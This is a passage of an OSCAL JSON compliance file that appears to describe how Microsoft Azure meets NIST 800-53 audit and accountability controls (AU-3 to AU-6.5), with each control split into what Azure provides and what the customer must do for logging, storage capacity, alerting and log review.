statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc5d479d-6201-4f6c-8224-5c56cd4a155f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-3","statements":[{"uuid":"047df933-cdbf-4151-9dbb-bc8b8a6a8c02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-3_smt","by-components":[{"uuid":"22112463-dfd4-43e7-9318-94a916c36844","export":{"provided":[{"uuid":"f404b55e-9f9c-4347-a7fa-8e3d402559c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"}],"description":"Azure utilizes auditing configurations that ensure the auditable event metadata contains at a minimum what type of event occurred, when the event occurred, where the event occurred, the source of the event, the outcome of the event, and the identifiers associated with the event. 
Exactly how this is captured varies for each asset, but the Azure configuration baselines for servers, network devices, and services include the minimum requirements specified above."}],"responsibilities":[{"uuid":"340680e4-b40b-468c-bae2-70138067aa65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"}],"description":"The customer is responsible for configuring Azure auditing capabilities on customer-deployed resources to generate audit records containing the following: what type of event occurred, when the event occurred, where the event occurred, the source of the event, the outcome of the event, and the identity of any subjects associated with the event.","provided-uuid":"f404b55e-9f9c-4347-a7fa-8e3d402559c2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"436908f2-fe72-45ec-b341-e1179755c342","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-3.1","statements":[{"uuid":"beebf980-8ed6-4a28-8e56-dce1f889aef1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"au-3.1_smt","by-components":[{"uuid":"9a84d886-3ce6-41b4-a2e7-9a8402ee6d74","export":{"provided":[{"uuid":"33cc5667-5a01-4344-a94c-c2ca6b13d26d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"}],"description":"Azure collects audit record content including the additional content required. 
This content includes informational messages to diagnose or identify events, characteristics that describe or identify the object or resource being acted upon, and the number of bytes received and sent, all of which vary by event type and asset. The session, connection, transaction, or activity duration can be obtained by analyzing the audit records collected; events related to sessions, connections and transactions contain timestamps which can be analyzed to determine duration."}],"responsibilities":[{"uuid":"5deb98df-c60d-4444-99d9-64c0cd2af1d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"}],"description":"The customer is responsible for configuring Azure auditing capabilities on customer-deployed resources to ensure organizational audit record content requirements are implemented.","provided-uuid":"33cc5667-5a01-4344-a94c-c2ca6b13d26d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a0e70b24-8efc-452d-9f64-2a3f1938803b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-4","statements":[{"uuid":"4673eab8-9724-47db-8921-2d57b09be7b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-4_smt","by-components":[{"uuid":"1cd02a5a-d312-46bb-971f-34c49c10b980","export":{"provided":[{"uuid":"256a1092-be59-483d-a48f-d592fdb88f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"}],"description":"Audit records for each Azure service are captured by the Geneva Monitoring Agent (MA) and retained in a service-specific Azure storage account. The MA collects data from the service assets and automatically uploads to the service storage account. Each storage account is allocated sufficient storage capacity for the retention of at least ninety (90) days' worth of logs online and is monitored for usage by the service teams. If a storage account is near capacity, either service teams are notified by Azure Storage automatically and the service team creates an additional storage account or expands the current account's capacity, or, if the service team has configured Azure Storage for auto-expansion, the storage is increased as needed. Each service team is responsible for its own log capacity planning. If the service team does not expand capacity for any reason, then, due to the high volume of events received, Azure audit collection settings are configured to overwrite when capacity is exceeded. The MA then sends the collected logs from the service-specific storage into a central log storage cluster known as the parsing engine. This local cluster stores centrally aggregated log data for the purposes of standardizing the ingested log data, such as time, date, field titles, etc., and parsing the data for alerting via multiple microservices. The logs do not reside on these servers long-term; once parsed, logs are provided to Kusto and Jarvis. Kusto and Jarvis then retain the parsed data as read-only, ensuring the integrity of the centralized logs, automatically growing the backend data storage. There is no hard limit associated with the central storage. Azure currently defines baseline requirements for local security audit log storage capacity to a window of at least ten (10) minutes of events on even Azure's most active hosts. 
Events are continuously sent to Geneva Monitoring, which has adequate storage capacity to handle the volume of events captured due to auto-expansion. In the event of an audit failure or audit storage capacity being reached, Azure monitoring tools generate near-real time alerts to the C+AI Security Engineering team, who are assigned to address the processing failure."}],"responsibilities":[{"uuid":"f5ef1a82-aa82-4a43-ab32-417aad2510e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for allocating audit log storage capacity for customer-deployed resources. Additionally, the customer should consider the retention period defined in AU-11 when allocating storage capacity for audit","provided-uuid":"256a1092-be59-483d-a48f-d592fdb88f68"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae005091-3810-445e-813c-3ea6b676e73a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5","statements":[{"uuid":"38cec9f4-5fc5-4b6b-b89d-d052b2f0ccdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5_smt.a","by-components":[{"uuid":"35b9a73f-029d-41bd-9bac-ca04fd7b6b49","export":{"provided":[{"uuid":"ac670dc7-37cb-4a44-b2a1-9b253ef14b28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"}],"description":"The Geneva 
Monitoring Agent (MA) is responsible for capturing log events and storing them in storage accounts specific to each service team. Incident Management (IcM) is an automated mechanism for scanning log storage and raising alerts when specific predefined criteria are met. IcM generates email notifications and creates a corresponding IcM ticket for action. IcM actively monitors Azure based on the filters and the thresholds identified within the rules defined by the Azure Security team and respective service teams. Key alerts include, but are not limited to, if AzSecPack is not installed, if audit data is not being received, and if the data decreases by a specific percentage, indicating an audit logging failure somewhere in the log pipeline. All alerts follow the incident management procedures, which include analysis to determine whether further action is necessary by either the service team or Security Response Team."}],"responsibilities":[{"uuid":"d4032a85-3e60-4e71-b166-3e7acc73cf8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing alerts in response to audit processing failures (e.g., storage quota is reached, audit hardware/software errors) of customer-deployed resources.","provided-uuid":"ac670dc7-37cb-4a44-b2a1-9b253ef14b28"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a82f4107-8083-4c9d-adea-4580fe61fbb8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5_smt.b","by-components":[{"uuid":"09f801b8-4c55-4800-90d4-19bc32d40db3","export":{"provided":[{"uuid":"7cac45e7-355d-442a-bd60-34b71a9a351e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"}],"description":"In the event of an audit failure or audit storage capacity being reached, monitoring tools alert the C+AI Security Engineering team in near real time, who are assigned to address the processing failure. Alerts for audit processing failures are investigated immediately following the incident management process and appropriate actions are taken in accordance with the incident management process. 
In addition, if the failure is that the storage repository is full, Azure is configured to overwrite the oldest data to preserve the most recent information for after-the-fact investigations."}],"responsibilities":[{"uuid":"3c53a536-79fa-460b-8478-9236224a24d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for taking action when audit processing failures occur for customer-deployed resources.","provided-uuid":"7cac45e7-355d-442a-bd60-34b71a9a351e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"31bf8be1-203e-4e60-b648-2f2b013248d0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5.1","statements":[{"uuid":"b6d9231f-9e8b-40f3-a16c-83f6b31d9812","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5.1_smt","by-components":[{"uuid":"47e7824b-57ed-483c-879a-e782fb222d26","export":{"provided":[{"uuid":"f1816823-28d4-461e-bbbd-83be043222dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"}],"description":"Most services use Azure Storage auto-expansion for service team storage of logs. When the storage account reaches a specific threshold of 90%, Azure Storage automatically provisions additional space. 
For services that have not transitioned to auto-expansion, automated messages are sent out in near-real time, alerting service teams whenever the pre-determined thresholds of 80% and 95% of storage capacity are crossed. If the storage repository is full because a service team was unable to resolve the alert in time, Azure is configured to overwrite the oldest data to preserve the most recent information for after-the-fact investigations."}],"responsibilities":[{"uuid":"1201a54c-0390-4430-b721-c3a439f2ce6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"}],"description":"The customer is responsible for configuring an audit record storage capacity warning for customer-deployed resources including the percentage of storage capacity at which a warning is required; the time period within which the warning must occur; and the personnel, roles, and/or locations to be notified.","provided-uuid":"f1816823-28d4-461e-bbbd-83be043222dd"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1708700a-e4ed-464f-907b-c0ee311e2e4d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5.2","statements":[{"uuid":"533cabee-9d40-4bf3-a655-bd1ffc47199a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5.2_smt","by-components":[{"uuid":"50b26d21-f1e6-4ac5-82f4-62c5dbc9db49","export":{"provided":[{"uuid":"9a119c8a-bcba-409a-bfa2-6e67f627bff6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"}],"description":"The Geneva Monitoring Agent (MA) is responsible for capturing log events and storing them in storage accounts specific to each service team. Incident Management (IcM) is an automated mechanism for scanning log storage and raising alerts when specific predefined criteria are met. IcM generates email notifications and creates a corresponding IcM ticket for action. IcM actively monitors Azure based on the filters and the thresholds identified within the rules defined by the Azure Security team and respective service teams. Key alerts include, but are not limited to, if AzSecPack is not installed, if audit data is not being received, and if the data decreases by a specific percentage, indicating an audit logging failure somewhere in the log pipeline. 
All alerts follow the incident management procedures, which include analysis to determine whether further action is necessary by either the service team or Security Response Team."}],"responsibilities":[{"uuid":"f3ccacef-1a7b-4621-a005-81d3e30dd7f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"}],"description":"The customer is responsible for providing real-time alerts for audit event failures for customer-deployed resources.","provided-uuid":"9a119c8a-bcba-409a-bfa2-6e67f627bff6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4d9ba720-7a11-45d9-8d04-4bec78531dbb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6","statements":[{"uuid":"3cf8bedc-cd94-4405-900d-d0b5654b3687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.a","by-components":[{"uuid":"46ba4766-e32a-45aa-bdbf-4c3de85b2d5b","export":{"provided":[{"uuid":"e9dc6207-35e8-4aea-a8ba-72509e50d15d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. 
Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. The policies are tuned to alert on events of immediate concern. There are multiple detection authoring teams across Azure. This includes data scientists working on Microsoft Defender for Cloud and the Microsoft Threat Intelligence Center (MSTIC) who write detections for both external customer use via ASC and enable coverage of applicable detections for internal Azure services via the logging and monitoring pipeline. Examples of the detections are documented in the help topic for ASC detection capabilities at the link below. <https://docs.microsoft.com/en-us/azure/security-center/security-center-detection-capabilities> This includes integrated threat intelligence which looks for known bad actors by leveraging global threat intelligence from Microsoft products and services, the Microsoft Digital Crimes Unit (DCU), the Microsoft Security Response Center (MSRC), and external feeds, behavioral analytics, which applies known patterns to discover malicious behavior, and anomaly detection, which uses statistical profiling to build a historical baseline and alerts on deviations from established baselines that conform to a potential attack vector. 
Examples of detections running for internal Azure services include suspicious process execution, malicious PowerShell scripts, lateral movement and internal reconnaissance, and hidden virus, malware, and exploitation attempts. These detections are routed to MSRC for triage and investigation. The ASM team has atomic near-real-time monitors for unexpected asset access, virus and malware, and audit processing failures such as clearing the security event log and system time changes. The alerts are auto-routed to services for review, except for identified high value assets (HVA), where the alerts are centrally triaged by the Security Response Team. Once the raw logs are automatically correlated and processed, the appropriate teams review and analyze the alerts generated by the detections and by the automated review of audit records, whether in real time, on customer request or escalation, or in response to any other production issue affecting the alert. Groups of these correlated events that match the pattern of a known attack methodology are collected and delivered to appropriate personnel via IcM, email, or work item. Personnel correlate alerts and append them to tickets for review and analysis and, where necessary, for authoring new detections or refining existing ones. The alerting system provides a response capability twenty-four (24) hours a day, seven (7) days a week. 
Troubleshooting Guides (TSGs) applied to work tickets provide instructions for the escalation of certain events to response personnel."}],"responsibilities":[{"uuid":"97883d76-bdec-4cbd-a252-52206d8d177c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"}],"description":"The customer is responsible for reviewing and analyzing audit records of customer-deployed resources to identify inappropriate or unusual activity and the potential impact.","provided-uuid":"e9dc6207-35e8-4aea-a8ba-72509e50d15d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b9437026-99b1-456a-8599-a5e1b73a7d30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.b","by-components":[{"uuid":"12b7e7aa-97ef-4597-94c8-d7e4e776b7e8","export":{"provided":[{"uuid":"8183f1bb-2150-48b2-9fd7-325a6fe0af0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"}],"description":"Azure configures the detections and resulting alerts to be sent to the appropriate parties for resolution. Depending on the alert, this can include the service team or the Security Response Team. For example, use of a Break-Glass account generates an alert to the service team owning the subscription in which Break-Glass account access was utilized. Alternatively, malicious PowerShell scripts are routed to the Security Response Team. 
Regardless of which team the alert is routed to, all service teams, Azure personnel, and external customers can escalate an incident or report a new one."}],"responsibilities":[{"uuid":"076412d0-2d3f-4b0c-953f-ae9ac4117407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reporting findings of inappropriate or unusual activity (defined in AU-06.a) on customer-deployed resources.","provided-uuid":"8183f1bb-2150-48b2-9fd7-325a6fe0af0c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"82baf9d6-6f0e-416d-b62e-72adb80b9399","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.c","by-components":[{"uuid":"bad738c6-bc7b-464f-94a8-78bda73b1e7a","export":{"provided":[{"uuid":"d210657b-582a-45f1-8566-ea0b8f0b47f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"}],"description":"Azure Security receives alerts from vendor websites, other third-party services such as Internet Security Systems, US-CERT advisories and alerts, and Microsoft-published bulletins and adjusts the level of auditing in two ways - first, Azure notifies Azure service teams if a change in the level of monitoring is necessary due to indications of increased risk, and service teams adjust monitoring accordingly. Second, Azure tailors detections to look for specific threats based on the nature of the risk to Azure operations and assets. 
When circumstances dictate a review of the auditing procedures, such as a change in risk level based on law enforcement information, intelligence information, or other credible sources of information, the C+AI Security team, together with stakeholders from the Security Response Team, Security Governance Platform, Compliance, Risk, Architecture, Threat, and Strategy, Security Architecture, and Security Engineering, may decide to modify the audit procedures. C+AI Security may also make updates whenever a change occurs in the threat environment as defined by authoritative sources."}],"responsibilities":[{"uuid":"be7aef76-3bf8-461d-8f21-9f30ba2c22a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for adjusting the level of audit review, analysis, and reporting for customer-deployed resources when there is a change in risk based on information provided by law enforcement, intelligence, or other credible sources.","provided-uuid":"d210657b-582a-45f1-8566-ea0b8f0b47f9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a40c5461-2636-4131-9770-6bf868c8f1ff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.1","statements":[{"uuid":"4f68f8e6-7142-45e9-ae87-1481870fb099","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.1_smt","by-components":[{"uuid":"2bd352cd-93be-49d5-b21c-1485bf1b5dde","export":{"provided":[{"uuid":"d904569b-7124-403d-a528-cb473a0e7ae3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"}],"description":"Audit review, analysis, and reporting processes are automated using Geneva Monitoring, Azure Security Monitoring (ASM), SCUBA, and other tools. ASM and SCUBA analyze event distribution to identify spikes in event traffic and perform aggregate analysis such as anomaly detection, filtering and whitelisting rules, specific event alert triggers, and more. ASM can generate summary reports using predefined queries. Geneva Monitoring applies correlation logic and intelligence to the audit log events. 
All detection systems can generate alerts automatically."}],"responsibilities":[{"uuid":"fac8099b-e809-45b7-b4a8-9d665d6b2709","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"}],"description":"The customer is responsible for automating the audit review, analysis, and reporting of suspicious activities within customer-deployed resources.","provided-uuid":"d904569b-7124-403d-a528-cb473a0e7ae3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d7997be3-60df-4573-9f7c-56222272bd39","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.3","statements":[{"uuid":"f33bd72f-81c2-453c-a391-28c63b941ce2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.3_smt","by-components":[{"uuid":"e3285014-c8c6-4929-861d-04492bcf9424","export":{"provided":[{"uuid":"b88561fd-0667-4f7f-bf91-a46bb3f4a932","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. 
Instead, Azure implements automated methods to perform review, analysis, and reporting of logs.\n\nAzure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. The policies are tuned to alert on events of immediate concern."}],"responsibilities":[{"uuid":"3ed0f143-5141-4148-960a-da9d6d079783","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"}],"description":"The customer is responsible for analyzing and correlating audit records (defined in AU-06) across customer-deployed repositories.","provided-uuid":"b88561fd-0667-4f7f-bf91-a46bb3f4a932"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"53d73d1b-17c3-4e30-8cf7-ef85408dd8f3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.4","statements":[{"uuid":"5d861da4-07b7-43d0-9148-f32bc1e1917e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.4_smt","by-components":[{"uuid":"a5c83bfa-4d87-437c-bb40-8cabc884be28","export":{"provided":[{"uuid":"e0a8f9d6-9b20-4237-8392-b276e17e0cff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs.\n\nAzure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. 
The policies are tuned to alert on events of immediate concern."}],"responsibilities":[{"uuid":"7e50ad91-d77f-4bd4-9661-7f5ed92a865c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"}],"description":"The customer is responsible for providing the capability to centrally review and analyze audit records collected from customer-deployed resources.","provided-uuid":"e0a8f9d6-9b20-4237-8392-b276e17e0cff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ad87ffd-8591-4409-9892-aaf3c3565dcd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.5","statements":[{"uuid":"8877fb6a-d2f5-491c-8a5c-46984c2bfbf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.5_smt","by-components":[{"uuid":"b47a22f8-9b46-4ed4-a44d-f48a3992cc77","export":{"provided":[{"uuid":"f2dbabce-7d26-4736-9a65-f96a53cedd52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"}],"description":"Azure correlates vulnerability scanning information with internal and external penetration test results and audit records to gain a more complete picture of potential exploits and to enhance the ability to detect inappropriate activity, should it occur. Additionally, Azure uses vulnerability scanning reports in conjunction with performance and system monitoring data to identify unusual activity. 
Azure combines the use of various sources of intelligence to aid incident investigation on an as-needed basis, including the use of audit logging data, incident response reports, vulnerability scan data, and penetration testing results. The correlation of this information is part of the identification phase of the incident management process and aids in discovering the presence of inappropriate activity in the Azure environment."}],"responsibilities":[{"uuid":"268ec97a-849b-4dd8-be7e-daca7423e091","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"}],"description":"The customer is responsible for integrating audit record analysis with analysis of data/information collected from other sources to further identify suspicious activity within customer-deployed resources.","provided-uuid":"f2dbabce-7d26-4736-9a65-f96a53cedd52"}]},"description":"See inheritance and customer responsibility 